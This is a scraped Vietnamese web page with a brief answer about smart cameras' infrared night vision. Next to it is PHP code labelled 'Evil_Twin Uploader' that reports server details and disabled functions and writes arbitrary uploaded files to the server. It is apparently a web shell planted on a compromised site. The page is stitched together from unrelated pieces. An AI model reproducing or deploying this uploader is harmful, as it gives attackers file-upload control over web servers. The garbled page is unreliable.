Evil_Twin Uploader

Camera thông minh có hoạt động vào ban đêm không?

Camera thông minh được trang bị đèn hồng ngoại giúp bạn có thể quan sát vào ban đêm. Tầm nhìn theo dõi ban đêm cho chất lượng hình ảnh tốt với khoảng cách vật thể khoảng 6 mét.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial